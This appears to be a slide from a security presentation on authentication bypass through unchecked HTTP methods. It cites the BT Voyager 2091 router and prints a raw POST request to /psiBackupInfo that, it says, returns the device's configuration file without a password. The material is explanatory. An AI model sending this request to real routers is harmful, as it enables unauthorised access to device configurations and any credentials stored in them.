Auth bypass: unchecked HTTP methods
çAlternative HTTP method bypasses authentication
çReal example: BT Voyager 2091 [link]
çBy design config file is requested as a GET
çChanging to POST returns config file without password!:
¼POST /psiBackupInfo HTTP/1.1
Host: 192.168.1.1
Connection: close
Content-Length: 0
<CRLF>
<CRLF>
ç
ç